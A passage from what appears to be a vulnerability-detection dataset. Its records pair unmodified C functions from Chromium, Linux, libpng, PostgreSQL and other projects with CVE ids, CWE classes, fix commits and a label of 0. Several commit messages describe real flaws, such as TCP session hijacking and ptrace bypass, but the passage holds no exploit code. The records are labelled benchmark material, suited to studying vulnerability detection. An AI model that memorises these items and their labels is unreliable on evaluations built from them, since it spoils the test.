s = rdp_init_data(8);
out_uint16_le(s, action);
out_uint16(s, 0); /* userid */
out_uint32(s, 0); /* control id */
s_mark_end(s);
rdp_send_data(s, RDP_DATA_PDU_CONTROL);
}
|
rdp_send_control(uint16 action)
{
STREAM s;
s = rdp_init_data(8);
out_uint16_le(s, action);
out_uint16(s, 0); /* userid */
out_uint32(s, 0); /* control id */
s_mark_end(s);
rdp_send_data(s, RDP_DATA_PDU_CONTROL);
}
|
C
|
rdesktop
| 0 |
CVE-2017-15423
|
https://www.cvedetails.com/cve/CVE-2017-15423/
|
CWE-310
|
https://github.com/chromium/chromium/commit/a263d1cf62a9c75be6aaafdec88aacfcef1e8fd2
|
a263d1cf62a9c75be6aaafdec88aacfcef1e8fd2
|
Roll src/third_party/boringssl/src 664e99a64..696c13bd6
https://boringssl.googlesource.com/boringssl/+log/664e99a6486c293728097c661332f92bf2d847c6..696c13bd6ab78011adfe7b775519c8b7cc82b604
BUG=778101
Change-Id: I8dda4f3db952597148e3c7937319584698d00e1c
Reviewed-on: https://chromium-review.googlesource.com/747941
Reviewed-by: Avi Drissman <avi@chromium.org>
Reviewed-by: David Benjamin <davidben@chromium.org>
Commit-Queue: Steven Valdez <svaldez@chromium.org>
Cr-Commit-Position: refs/heads/master@{#513774}
|
void BrowserMainLoop::GetCompositingModeReporter(
viz::mojom::CompositingModeReporterRequest request) {
bool use_viz =
base::CommandLine::ForCurrentProcess()->HasSwitch(switches::kEnableViz);
if (IsUsingMus() || use_viz) {
} else {
compositing_mode_reporter_bindings_.AddBinding(
compositing_mode_reporter_impl_.get(), std::move(request));
}
}
|
void BrowserMainLoop::GetCompositingModeReporter(
viz::mojom::CompositingModeReporterRequest request) {
bool use_viz =
base::CommandLine::ForCurrentProcess()->HasSwitch(switches::kEnableViz);
if (IsUsingMus() || use_viz) {
} else {
compositing_mode_reporter_bindings_.AddBinding(
compositing_mode_reporter_impl_.get(), std::move(request));
}
}
|
C
|
Chrome
| 0 |
CVE-2013-2929
|
https://www.cvedetails.com/cve/CVE-2013-2929/
|
CWE-264
|
https://github.com/torvalds/linux/commit/d049f74f2dbe71354d43d393ac3a188947811348
|
d049f74f2dbe71354d43d393ac3a188947811348
|
exec/ptrace: fix get_dumpable() incorrect tests
The get_dumpable() return value is not boolean. Most users of the
function actually want to be testing for non-SUID_DUMP_USER(1) rather than
SUID_DUMP_DISABLE(0). The SUID_DUMP_ROOT(2) is also considered a
protected state. Almost all places did this correctly, excepting the two
places fixed in this patch.
Wrong logic:
if (dumpable == SUID_DUMP_DISABLE) { /* be protective */ }
or
if (dumpable == 0) { /* be protective */ }
or
if (!dumpable) { /* be protective */ }
Correct logic:
if (dumpable != SUID_DUMP_USER) { /* be protective */ }
or
if (dumpable != 1) { /* be protective */ }
Without this patch, if the system had set the sysctl fs/suid_dumpable=2, a
user was able to ptrace attach to processes that had dropped privileges to
that user. (This may have been partially mitigated if Yama was enabled.)
The macros have been moved into the file that declares get/set_dumpable(),
which means things like the ia64 code can see them too.
CVE-2013-2929
Reported-by: Vasily Kulikov <segoon@openwall.com>
Signed-off-by: Kees Cook <keescook@chromium.org>
Cc: "Luck, Tony" <tony.luck@intel.com>
Cc: Oleg Nesterov <oleg@redhat.com>
Cc: "Eric W. Biederman" <ebiederm@xmission.com>
Cc: <stable@vger.kernel.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
|
int bprm_change_interp(char *interp, struct linux_binprm *bprm)
{
/* If a binfmt changed the interp, free it first. */
if (bprm->interp != bprm->filename)
kfree(bprm->interp);
bprm->interp = kstrdup(interp, GFP_KERNEL);
if (!bprm->interp)
return -ENOMEM;
return 0;
}
|
int bprm_change_interp(char *interp, struct linux_binprm *bprm)
{
/* If a binfmt changed the interp, free it first. */
if (bprm->interp != bprm->filename)
kfree(bprm->interp);
bprm->interp = kstrdup(interp, GFP_KERNEL);
if (!bprm->interp)
return -ENOMEM;
return 0;
}
|
C
|
linux
| 0 |
CVE-2016-5696
|
https://www.cvedetails.com/cve/CVE-2016-5696/
|
CWE-200
|
https://github.com/torvalds/linux/commit/75ff39ccc1bd5d3c455b6822ab09e533c551f758
|
75ff39ccc1bd5d3c455b6822ab09e533c551f758
|
tcp: make challenge acks less predictable
Yue Cao claims that current host rate limiting of challenge ACKS
(RFC 5961) could leak enough information to allow a patient attacker
to hijack TCP sessions. He will soon provide details in an academic
paper.
This patch increases the default limit from 100 to 1000, and adds
some randomization so that the attacker can no longer hijack
sessions without spending a considerable amount of probes.
Based on initial analysis and patch from Linus.
Note that we also have per socket rate limiting, so it is tempting
to remove the host limit in the future.
v2: randomize the count of challenge acks per second, not the period.
Fixes: 282f23c6ee34 ("tcp: implement RFC 5961 3.2")
Reported-by: Yue Cao <ycao009@ucr.edu>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Suggested-by: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Yuchung Cheng <ycheng@google.com>
Cc: Neal Cardwell <ncardwell@google.com>
Acked-by: Neal Cardwell <ncardwell@google.com>
Acked-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
|
static void tcp_snd_una_update(struct tcp_sock *tp, u32 ack)
{
u32 delta = ack - tp->snd_una;
sock_owned_by_me((struct sock *)tp);
u64_stats_update_begin_raw(&tp->syncp);
tp->bytes_acked += delta;
u64_stats_update_end_raw(&tp->syncp);
tp->snd_una = ack;
}
|
static void tcp_snd_una_update(struct tcp_sock *tp, u32 ack)
{
u32 delta = ack - tp->snd_una;
sock_owned_by_me((struct sock *)tp);
u64_stats_update_begin_raw(&tp->syncp);
tp->bytes_acked += delta;
u64_stats_update_end_raw(&tp->syncp);
tp->snd_una = ack;
}
|
C
|
linux
| 0 |
null | null | null |
https://github.com/chromium/chromium/commit/f2f703241635fa96fa630b83afcc9a330cc21b7e
|
f2f703241635fa96fa630b83afcc9a330cc21b7e
|
CrOS Shelf: Get rid of 'split view' mode for shelf background
In the new UI, "maximized" and "split view" are treated the same in
specs, so there is no more need for a separate "split view" mode. This
folds it into the "maximized" mode.
Note that the only thing that _seems_ different in
shelf_background_animator is ShelfBackgroundAnimator::kMaxAlpha (255)
vs kShelfTranslucentMaximizedWindow (254), which should be virtually
impossible to distinguish.
This CL therefore does not have any visual effect (and doesn't
directly fix the linked bug, but is relevant).
Bug: 899289
Change-Id: I60947338176ac15ca016b1ba4edf13d16362cb24
Reviewed-on: https://chromium-review.googlesource.com/c/1469741
Commit-Queue: Xiyuan Xia <xiyuan@chromium.org>
Reviewed-by: Xiyuan Xia <xiyuan@chromium.org>
Auto-Submit: Manu Cornet <manucornet@chromium.org>
Cr-Commit-Position: refs/heads/master@{#631752}
|
aura::Window* CreateTestWindow() {
aura::Window* window = window_factory::NewWindow().release();
window->SetProperty(aura::client::kShowStateKey, ui::SHOW_STATE_NORMAL);
window->SetType(aura::client::WINDOW_TYPE_NORMAL);
window->Init(ui::LAYER_TEXTURED);
ParentWindowInPrimaryRootWindow(window);
return window;
}
|
aura::Window* CreateTestWindow() {
aura::Window* window = window_factory::NewWindow().release();
window->SetProperty(aura::client::kShowStateKey, ui::SHOW_STATE_NORMAL);
window->SetType(aura::client::WINDOW_TYPE_NORMAL);
window->Init(ui::LAYER_TEXTURED);
ParentWindowInPrimaryRootWindow(window);
return window;
}
|
C
|
Chrome
| 0 |
CVE-2011-2495
|
https://www.cvedetails.com/cve/CVE-2011-2495/
|
CWE-264
|
https://github.com/torvalds/linux/commit/1d1221f375c94ef961ba8574ac4f85c8870ddd51
|
1d1221f375c94ef961ba8574ac4f85c8870ddd51
|
proc: restrict access to /proc/PID/io
/proc/PID/io may be used for gathering private information. E.g. for
openssh and vsftpd daemons wchars/rchars may be used to learn the
precise password length. Restrict it to processes being able to ptrace
the target process.
ptrace_may_access() is needed to prevent keeping open file descriptor of
"io" file, executing setuid binary and gathering io information of the
setuid'ed process.
Signed-off-by: Vasiliy Kulikov <segoon@openwall.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
|
static int do_proc_readlink(struct path *path, char __user *buffer, int buflen)
{
char *tmp = (char*)__get_free_page(GFP_TEMPORARY);
char *pathname;
int len;
if (!tmp)
return -ENOMEM;
pathname = d_path(path, tmp, PAGE_SIZE);
len = PTR_ERR(pathname);
if (IS_ERR(pathname))
goto out;
len = tmp + PAGE_SIZE - 1 - pathname;
if (len > buflen)
len = buflen;
if (copy_to_user(buffer, pathname, len))
len = -EFAULT;
out:
free_page((unsigned long)tmp);
return len;
}
|
static int do_proc_readlink(struct path *path, char __user *buffer, int buflen)
{
char *tmp = (char*)__get_free_page(GFP_TEMPORARY);
char *pathname;
int len;
if (!tmp)
return -ENOMEM;
pathname = d_path(path, tmp, PAGE_SIZE);
len = PTR_ERR(pathname);
if (IS_ERR(pathname))
goto out;
len = tmp + PAGE_SIZE - 1 - pathname;
if (len > buflen)
len = buflen;
if (copy_to_user(buffer, pathname, len))
len = -EFAULT;
out:
free_page((unsigned long)tmp);
return len;
}
|
C
|
linux
| 0 |
CVE-2014-1713
|
https://www.cvedetails.com/cve/CVE-2014-1713/
|
CWE-399
|
https://github.com/chromium/chromium/commit/f85a87ec670ad0fce9d98d90c9a705b72a288154
|
f85a87ec670ad0fce9d98d90c9a705b72a288154
|
document.location bindings fix
BUG=352374
R=jochen@chromium.org
Review URL: https://codereview.chromium.org/196343011
git-svn-id: svn://svn.chromium.org/blink/trunk@169176 bbb929c8-8fbe-4397-9dbb-9b2b20218538
|
static void methodWithEnforceRangeUInt16MethodCallback(const v8::FunctionCallbackInfo<v8::Value>& info)
{
TRACE_EVENT_SET_SAMPLING_STATE("Blink", "DOMMethod");
TestObjectV8Internal::methodWithEnforceRangeUInt16Method(info);
TRACE_EVENT_SET_SAMPLING_STATE("V8", "V8Execution");
}
|
static void methodWithEnforceRangeUInt16MethodCallback(const v8::FunctionCallbackInfo<v8::Value>& info)
{
TRACE_EVENT_SET_SAMPLING_STATE("Blink", "DOMMethod");
TestObjectV8Internal::methodWithEnforceRangeUInt16Method(info);
TRACE_EVENT_SET_SAMPLING_STATE("V8", "V8Execution");
}
|
C
|
Chrome
| 0 |
CVE-2016-3751
|
https://www.cvedetails.com/cve/CVE-2016-3751/
| null |
https://android.googlesource.com/platform/external/libpng/+/9d4853418ab2f754c2b63e091c29c5529b8b86ca
|
9d4853418ab2f754c2b63e091c29c5529b8b86ca
|
DO NOT MERGE Update libpng to 1.6.20
BUG:23265085
Change-Id: I85199805636d771f3597b691b63bc0bf46084833
(cherry picked from commit bbe98b40cda082024b669fa508931042eed18f82)
|
freebuffer(Image *image)
{
if (image->buffer) free(image->buffer);
image->buffer = NULL;
image->bufsize = 0;
image->allocsize = 0;
}
|
freebuffer(Image *image)
{
if (image->buffer) free(image->buffer);
image->buffer = NULL;
image->bufsize = 0;
image->allocsize = 0;
}
|
C
|
Android
| 0 |
CVE-2015-1265
|
https://www.cvedetails.com/cve/CVE-2015-1265/
| null |
https://github.com/chromium/chromium/commit/04ff52bb66284467ccb43d90800013b89ee8db75
|
04ff52bb66284467ccb43d90800013b89ee8db75
|
Switching AudioOutputAuthorizationHandler from using AudioManager interface to AudioSystem one.
BUG=672468
CQ_INCLUDE_TRYBOTS=master.tryserver.chromium.linux:linux_optional_gpu_tests_rel;master.tryserver.chromium.mac:mac_optional_gpu_tests_rel;master.tryserver.chromium.win:win_optional_gpu_tests_rel
Review-Url: https://codereview.chromium.org/2692203003
Cr-Commit-Position: refs/heads/master@{#450939}
|
void RenderProcessHostImpl::OnGpuSwitched() {
RecomputeAndUpdateWebKitPreferences();
}
|
void RenderProcessHostImpl::OnGpuSwitched() {
RecomputeAndUpdateWebKitPreferences();
}
|
C
|
Chrome
| 0 |
CVE-2015-3215
|
https://www.cvedetails.com/cve/CVE-2015-3215/
|
CWE-20
|
https://github.com/YanVugenfirer/kvm-guest-drivers-windows/commit/723416fa4210b7464b28eab89cc76252e6193ac1
|
723416fa4210b7464b28eab89cc76252e6193ac1
|
NetKVM: BZ#1169718: Checking the length only on read
Signed-off-by: Joseph Hindin <yhindin@rehat.com>
|
ProcessTCPHeader(tTcpIpPacketParsingResult _res, PVOID pIpHeader, ULONG len, USHORT ipHeaderSize)
{
ULONG tcpipDataAt;
tTcpIpPacketParsingResult res = _res;
tcpipDataAt = ipHeaderSize + sizeof(TCPHeader);
res.TcpUdp = ppresIsTCP;
if (len >= tcpipDataAt)
{
TCPHeader *pTcpHeader = (TCPHeader *)RtlOffsetToPointer(pIpHeader, ipHeaderSize);
res.xxpStatus = ppresXxpKnown;
res.xxpFull = TRUE;
tcpipDataAt = ipHeaderSize + TCP_HEADER_LENGTH(pTcpHeader);
res.XxpIpHeaderSize = tcpipDataAt;
}
else
{
DPrintf(2, ("tcp: %d < min headers %d\n", len, tcpipDataAt));
res.xxpFull = FALSE;
res.xxpStatus = ppresXxpIncomplete;
}
return res;
}
|
ProcessTCPHeader(tTcpIpPacketParsingResult _res, PVOID pIpHeader, ULONG len, USHORT ipHeaderSize)
{
ULONG tcpipDataAt;
tTcpIpPacketParsingResult res = _res;
tcpipDataAt = ipHeaderSize + sizeof(TCPHeader);
res.TcpUdp = ppresIsTCP;
if (len >= tcpipDataAt)
{
TCPHeader *pTcpHeader = (TCPHeader *)RtlOffsetToPointer(pIpHeader, ipHeaderSize);
res.xxpStatus = ppresXxpKnown;
res.xxpFull = TRUE;
tcpipDataAt = ipHeaderSize + TCP_HEADER_LENGTH(pTcpHeader);
res.XxpIpHeaderSize = tcpipDataAt;
}
else
{
DPrintf(2, ("tcp: %d < min headers %d\n", len, tcpipDataAt));
res.xxpFull = FALSE;
res.xxpStatus = ppresXxpIncomplete;
}
return res;
}
|
C
|
kvm-guest-drivers-windows
| 0 |
CVE-2015-8746
|
https://www.cvedetails.com/cve/CVE-2015-8746/
| null |
https://github.com/torvalds/linux/commit/18e3b739fdc826481c6a1335ce0c5b19b3d415da
|
18e3b739fdc826481c6a1335ce0c5b19b3d415da
|
NFS: Fix a NULL pointer dereference of migration recovery ops for v4.2 client
---Steps to Reproduce--
<nfs-server>
# cat /etc/exports
/nfs/referal *(rw,insecure,no_subtree_check,no_root_squash,crossmnt)
/nfs/old *(ro,insecure,subtree_check,root_squash,crossmnt)
<nfs-client>
# mount -t nfs nfs-server:/nfs/ /mnt/
# ll /mnt/*/
<nfs-server>
# cat /etc/exports
/nfs/referal *(rw,insecure,no_subtree_check,no_root_squash,crossmnt,refer=/nfs/old/@nfs-server)
/nfs/old *(ro,insecure,subtree_check,root_squash,crossmnt)
# service nfs restart
<nfs-client>
# ll /mnt/*/ --->>>>> oops here
[ 5123.102925] BUG: unable to handle kernel NULL pointer dereference at (null)
[ 5123.103363] IP: [<ffffffffa03ed38b>] nfs4_proc_get_locations+0x9b/0x120 [nfsv4]
[ 5123.103752] PGD 587b9067 PUD 3cbf5067 PMD 0
[ 5123.104131] Oops: 0000 [#1]
[ 5123.104529] Modules linked in: nfsv4(OE) nfs(OE) fscache(E) nfsd(OE) xfs libcrc32c iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi coretemp crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel ppdev vmw_balloon parport_pc parport i2c_piix4 shpchp auth_rpcgss nfs_acl vmw_vmci lockd grace sunrpc vmwgfx drm_kms_helper ttm drm mptspi serio_raw scsi_transport_spi e1000 mptscsih mptbase ata_generic pata_acpi [last unloaded: nfsd]
[ 5123.105887] CPU: 0 PID: 15853 Comm: ::1-manager Tainted: G OE 4.2.0-rc6+ #214
[ 5123.106358] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 05/20/2014
[ 5123.106860] task: ffff88007620f300 ti: ffff88005877c000 task.ti: ffff88005877c000
[ 5123.107363] RIP: 0010:[<ffffffffa03ed38b>] [<ffffffffa03ed38b>] nfs4_proc_get_locations+0x9b/0x120 [nfsv4]
[ 5123.107909] RSP: 0018:ffff88005877fdb8 EFLAGS: 00010246
[ 5123.108435] RAX: ffff880053f3bc00 RBX: ffff88006ce6c908 RCX: ffff880053a0d240
[ 5123.108968] RDX: ffffea0000e6d940 RSI: ffff8800399a0000 RDI: ffff88006ce6c908
[ 5123.109503] RBP: ffff88005877fe28 R08: ffffffff81c708a0 R09: 0000000000000000
[ 5123.110045] R10: 00000000000001a2 R11: ffff88003ba7f5c8 R12: ffff880054c55800
[ 5123.110618] R13: 0000000000000000 R14: ffff880053a0d240 R15: ffff880053a0d240
[ 5123.111169] FS: 0000000000000000(0000) GS:ffffffff81c27000(0000) knlGS:0000000000000000
[ 5123.111726] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 5123.112286] CR2: 0000000000000000 CR3: 0000000054cac000 CR4: 00000000001406f0
[ 5123.112888] Stack:
[ 5123.113458] ffffea0000e6d940 ffff8800399a0000 00000000000167d0 0000000000000000
[ 5123.114049] 0000000000000000 0000000000000000 0000000000000000 00000000a7ec82c6
[ 5123.114662] ffff88005877fe18 ffffea0000e6d940 ffff8800399a0000 ffff880054c55800
[ 5123.115264] Call Trace:
[ 5123.115868] [<ffffffffa03fb44b>] nfs4_try_migration+0xbb/0x220 [nfsv4]
[ 5123.116487] [<ffffffffa03fcb3b>] nfs4_run_state_manager+0x4ab/0x7b0 [nfsv4]
[ 5123.117104] [<ffffffffa03fc690>] ? nfs4_do_reclaim+0x510/0x510 [nfsv4]
[ 5123.117813] [<ffffffff810a4527>] kthread+0xd7/0xf0
[ 5123.118456] [<ffffffff810a4450>] ? kthread_worker_fn+0x160/0x160
[ 5123.119108] [<ffffffff816d9cdf>] ret_from_fork+0x3f/0x70
[ 5123.119723] [<ffffffff810a4450>] ? kthread_worker_fn+0x160/0x160
[ 5123.120329] Code: 4c 8b 6a 58 74 17 eb 52 48 8d 55 a8 89 c6 4c 89 e7 e8 4a b5 ff ff 8b 45 b0 85 c0 74 1c 4c 89 f9 48 8b 55 90 48 8b 75 98 48 89 df <41> ff 55 00 3d e8 d8 ff ff 41 89 c6 74 cf 48 8b 4d c8 65 48 33
[ 5123.121643] RIP [<ffffffffa03ed38b>] nfs4_proc_get_locations+0x9b/0x120 [nfsv4]
[ 5123.122308] RSP <ffff88005877fdb8>
[ 5123.122942] CR2: 0000000000000000
Fixes: ec011fe847 ("NFS: Introduce a vector of migration recovery ops")
Cc: stable@vger.kernel.org # v3.13+
Signed-off-by: Kinglong Mee <kinglongmee@gmail.com>
Signed-off-by: Trond Myklebust <trond.myklebust@primarydata.com>
|
static int nfs4_proc_renew(struct nfs_client *clp, struct rpc_cred *cred)
{
struct rpc_message msg = {
.rpc_proc = &nfs4_procedures[NFSPROC4_CLNT_RENEW],
.rpc_argp = clp,
.rpc_cred = cred,
};
unsigned long now = jiffies;
int status;
status = rpc_call_sync(clp->cl_rpcclient, &msg, RPC_TASK_TIMEOUT);
if (status < 0)
return status;
do_renew_lease(clp, now);
return 0;
}
|
static int nfs4_proc_renew(struct nfs_client *clp, struct rpc_cred *cred)
{
struct rpc_message msg = {
.rpc_proc = &nfs4_procedures[NFSPROC4_CLNT_RENEW],
.rpc_argp = clp,
.rpc_cred = cred,
};
unsigned long now = jiffies;
int status;
status = rpc_call_sync(clp->cl_rpcclient, &msg, RPC_TASK_TIMEOUT);
if (status < 0)
return status;
do_renew_lease(clp, now);
return 0;
}
|
C
|
linux
| 0 |
CVE-2019-5790
|
https://www.cvedetails.com/cve/CVE-2019-5790/
|
CWE-190
|
https://github.com/chromium/chromium/commit/88fcb3a6899d77b64195423333ad81a00803f997
|
88fcb3a6899d77b64195423333ad81a00803f997
|
Move user activation check to RemoteFrame::Navigate's callers.
Currently RemoteFrame::Navigate is the user of
Frame::HasTransientUserActivation that passes a RemoteFrame*, and
it seems wrong because the user activation (user gesture) needed by
the navigation should belong to the LocalFrame that initiated the
navigation.
Follow-up CLs after this one will update UserActivation code in
Frame to take a LocalFrame* instead of a Frame*, and get rid of
redundant IPCs.
Bug: 811414
Change-Id: I771c1694043edb54374a44213d16715d9c7da704
Reviewed-on: https://chromium-review.googlesource.com/914736
Commit-Queue: Mustaq Ahmed <mustaq@chromium.org>
Reviewed-by: Daniel Cheng <dcheng@chromium.org>
Cr-Commit-Position: refs/heads/master@{#536728}
|
static ImageResourceContent* GetImageResource(Element* element) {
DCHECK(element);
LayoutObject* layout_object = element->GetLayoutObject();
if (!layout_object || !layout_object->IsImage())
return nullptr;
LayoutImage* image = ToLayoutImage(layout_object);
return image->CachedImage();
}
|
static ImageResourceContent* GetImageResource(Element* element) {
DCHECK(element);
LayoutObject* layout_object = element->GetLayoutObject();
if (!layout_object || !layout_object->IsImage())
return nullptr;
LayoutImage* image = ToLayoutImage(layout_object);
return image->CachedImage();
}
|
C
|
Chrome
| 0 |
null | null | null |
https://github.com/chromium/chromium/commit/5041f984669fe3a989a84c348eb838c8f7233f6b
|
5041f984669fe3a989a84c348eb838c8f7233f6b
|
AutoFill: Release the cached frame when we receive the frameDestroyed() message
from WebKit.
BUG=48857
TEST=none
Review URL: http://codereview.chromium.org/3173005
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@55789 0039d316-1c4b-4281-b951-d872f2087c98
|
void RenderView::willSendRequest(
WebFrame* frame, unsigned identifier, WebURLRequest& request,
const WebURLResponse& redirect_response) {
WebFrame* top_frame = frame->top();
if (!top_frame)
top_frame = frame;
WebDataSource* provisional_data_source = top_frame->provisionalDataSource();
WebDataSource* top_data_source = top_frame->dataSource();
WebDataSource* data_source =
provisional_data_source ? provisional_data_source : top_data_source;
if (data_source) {
NavigationState* state = NavigationState::FromDataSource(data_source);
if (state && state->is_cache_policy_override_set())
request.setCachePolicy(state->cache_policy_override());
}
if (top_data_source) {
NavigationState* state = NavigationState::FromDataSource(top_data_source);
if (state && request.targetType() == WebURLRequest::TargetIsPrefetch)
state->set_was_prefetcher(true);
}
request.setRequestorID(routing_id_);
if (CommandLine::ForCurrentProcess()->HasSwitch(switches::kNoReferrers))
request.clearHTTPHeaderField("Referer");
SiteIsolationMetrics::AddRequest(identifier, request.targetType());
}
|
void RenderView::willSendRequest(
WebFrame* frame, unsigned identifier, WebURLRequest& request,
const WebURLResponse& redirect_response) {
WebFrame* top_frame = frame->top();
if (!top_frame)
top_frame = frame;
WebDataSource* provisional_data_source = top_frame->provisionalDataSource();
WebDataSource* top_data_source = top_frame->dataSource();
WebDataSource* data_source =
provisional_data_source ? provisional_data_source : top_data_source;
if (data_source) {
NavigationState* state = NavigationState::FromDataSource(data_source);
if (state && state->is_cache_policy_override_set())
request.setCachePolicy(state->cache_policy_override());
}
if (top_data_source) {
NavigationState* state = NavigationState::FromDataSource(top_data_source);
if (state && request.targetType() == WebURLRequest::TargetIsPrefetch)
state->set_was_prefetcher(true);
}
request.setRequestorID(routing_id_);
if (CommandLine::ForCurrentProcess()->HasSwitch(switches::kNoReferrers))
request.clearHTTPHeaderField("Referer");
SiteIsolationMetrics::AddRequest(identifier, request.targetType());
}
|
C
|
Chrome
| 0 |
CVE-2014-9644
|
https://www.cvedetails.com/cve/CVE-2014-9644/
|
CWE-264
|
https://github.com/torvalds/linux/commit/4943ba16bbc2db05115707b3ff7b4874e9e3c560
|
4943ba16bbc2db05115707b3ff7b4874e9e3c560
|
crypto: include crypto- module prefix in template
This adds the module loading prefix "crypto-" to the template lookup
as well.
For example, attempting to load 'vfat(blowfish)' via AF_ALG now correctly
includes the "crypto-" prefix at every level, correctly rejecting "vfat":
net-pf-38
algif-hash
crypto-vfat(blowfish)
crypto-vfat(blowfish)-all
crypto-vfat
Reported-by: Mathias Krause <minipli@googlemail.com>
Signed-off-by: Kees Cook <keescook@chromium.org>
Acked-by: Mathias Krause <minipli@googlemail.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
|
static void crypto_cts_exit_tfm(struct crypto_tfm *tfm)
{
struct crypto_cts_ctx *ctx = crypto_tfm_ctx(tfm);
crypto_free_blkcipher(ctx->child);
}
|
static void crypto_cts_exit_tfm(struct crypto_tfm *tfm)
{
struct crypto_cts_ctx *ctx = crypto_tfm_ctx(tfm);
crypto_free_blkcipher(ctx->child);
}
|
C
|
linux
| 0 |
CVE-2014-1713
|
https://www.cvedetails.com/cve/CVE-2014-1713/
|
CWE-399
|
https://github.com/chromium/chromium/commit/f85a87ec670ad0fce9d98d90c9a705b72a288154
|
f85a87ec670ad0fce9d98d90c9a705b72a288154
|
document.location bindings fix
BUG=352374
R=jochen@chromium.org
Review URL: https://codereview.chromium.org/196343011
git-svn-id: svn://svn.chromium.org/blink/trunk@169176 bbb929c8-8fbe-4397-9dbb-9b2b20218538
|
static void nullableTestInterfaceAttributeAttributeSetterCallback(v8::Local<v8::String>, v8::Local<v8::Value> jsValue, const v8::PropertyCallbackInfo<void>& info)
{
TRACE_EVENT_SET_SAMPLING_STATE("Blink", "DOMSetter");
TestObjectPythonV8Internal::nullableTestInterfaceAttributeAttributeSetter(jsValue, info);
TRACE_EVENT_SET_SAMPLING_STATE("V8", "V8Execution");
}
|
static void nullableTestInterfaceAttributeAttributeSetterCallback(v8::Local<v8::String>, v8::Local<v8::Value> jsValue, const v8::PropertyCallbackInfo<void>& info)
{
TRACE_EVENT_SET_SAMPLING_STATE("Blink", "DOMSetter");
TestObjectPythonV8Internal::nullableTestInterfaceAttributeAttributeSetter(jsValue, info);
TRACE_EVENT_SET_SAMPLING_STATE("V8", "V8Execution");
}
|
C
|
Chrome
| 0 |
CVE-2014-3191
|
https://www.cvedetails.com/cve/CVE-2014-3191/
|
CWE-416
|
https://github.com/chromium/chromium/commit/11a4cc4a6d6e665d9a118fada4b7c658d6f70d95
|
11a4cc4a6d6e665d9a118fada4b7c658d6f70d95
|
Defer call to updateWidgetPositions() outside of RenderLayerScrollableArea.
updateWidgetPositions() can destroy the render tree, so it should never
be called from inside RenderLayerScrollableArea. Leaving it there allows
for the potential of use-after-free bugs.
BUG=402407
R=vollick@chromium.org
Review URL: https://codereview.chromium.org/490473003
git-svn-id: svn://svn.chromium.org/blink/trunk@180681 bbb929c8-8fbe-4397-9dbb-9b2b20218538
|
void FrameView::reset()
{
m_hasPendingLayout = false;
m_layoutSubtreeRoot = 0;
m_doFullPaintInvalidation = false;
m_layoutSchedulingEnabled = true;
m_inPerformLayout = false;
m_canInvalidatePaintDuringPerformLayout = false;
m_inSynchronousPostLayout = false;
m_layoutCount = 0;
m_nestedLayoutCount = 0;
m_postLayoutTasksTimer.stop();
m_updateWidgetsTimer.stop();
m_firstLayout = true;
m_firstLayoutCallbackPending = false;
m_wasScrolledByUser = false;
m_safeToPropagateScrollToParent = true;
m_lastViewportSize = IntSize();
m_lastZoomFactor = 1.0f;
m_isTrackingPaintInvalidations = false;
m_trackedPaintInvalidationRects.clear();
m_lastPaintTime = 0;
m_paintBehavior = PaintBehaviorNormal;
m_isPainting = false;
m_visuallyNonEmptyCharacterCount = 0;
m_visuallyNonEmptyPixelCount = 0;
m_isVisuallyNonEmpty = false;
m_firstVisuallyNonEmptyLayoutCallbackPending = true;
m_maintainScrollPositionAnchor = nullptr;
m_viewportConstrainedObjects.clear();
}
|
void FrameView::reset()
{
m_hasPendingLayout = false;
m_layoutSubtreeRoot = 0;
m_doFullPaintInvalidation = false;
m_layoutSchedulingEnabled = true;
m_inPerformLayout = false;
m_canInvalidatePaintDuringPerformLayout = false;
m_inSynchronousPostLayout = false;
m_layoutCount = 0;
m_nestedLayoutCount = 0;
m_postLayoutTasksTimer.stop();
m_updateWidgetsTimer.stop();
m_firstLayout = true;
m_firstLayoutCallbackPending = false;
m_wasScrolledByUser = false;
m_safeToPropagateScrollToParent = true;
m_lastViewportSize = IntSize();
m_lastZoomFactor = 1.0f;
m_isTrackingPaintInvalidations = false;
m_trackedPaintInvalidationRects.clear();
m_lastPaintTime = 0;
m_paintBehavior = PaintBehaviorNormal;
m_isPainting = false;
m_visuallyNonEmptyCharacterCount = 0;
m_visuallyNonEmptyPixelCount = 0;
m_isVisuallyNonEmpty = false;
m_firstVisuallyNonEmptyLayoutCallbackPending = true;
m_maintainScrollPositionAnchor = nullptr;
m_viewportConstrainedObjects.clear();
}
|
C
|
Chrome
| 0 |
CVE-2015-5289
|
https://www.cvedetails.com/cve/CVE-2015-5289/
|
CWE-119
|
https://git.postgresql.org/gitweb/?p=postgresql.git;a=commit;h=08fa47c4850cea32c3116665975bca219fbf2fe6
|
08fa47c4850cea32c3116665975bca219fbf2fe6
| null |
json_populate_recordset(PG_FUNCTION_ARGS)
{
return populate_recordset_worker(fcinfo, "json_populate_recordset", true);
}
|
json_populate_recordset(PG_FUNCTION_ARGS)
{
return populate_recordset_worker(fcinfo, "json_populate_recordset", true);
}
|
C
|
postgresql
| 0 |
CVE-2016-9557
|
https://www.cvedetails.com/cve/CVE-2016-9557/
|
CWE-190
|
https://github.com/mdadams/jasper/commit/d42b2388f7f8e0332c846675133acea151fc557a
|
d42b2388f7f8e0332c846675133acea151fc557a
|
The generation of the configuration file jas_config.h has been completely
reworked in order to avoid pollution of the global namespace.
Some problematic types like uchar, ulong, and friends have been replaced
with names with a jas_ prefix.
An option max_samples has been added to the BMP and JPEG decoders to
restrict the maximum size of image that they can decode. This change
was made as a (possibly temporary) fix to address security concerns.
A max_samples command-line option has also been added to imginfo.
Whether an image component (for jas_image_t) is stored in memory or on
disk is now based on the component size (rather than the image size).
Some debug log message were added.
Some new integer overflow checks were added.
Some new safe integer add/multiply functions were added.
More pre-C99 cruft was removed. JasPer has numerous "hacks" to
handle pre-C99 compilers. JasPer now assumes C99 support. So, this
pre-C99 cruft is unnecessary and can be removed.
The regression jasper-doublefree-mem_close.jpg has been re-enabled.
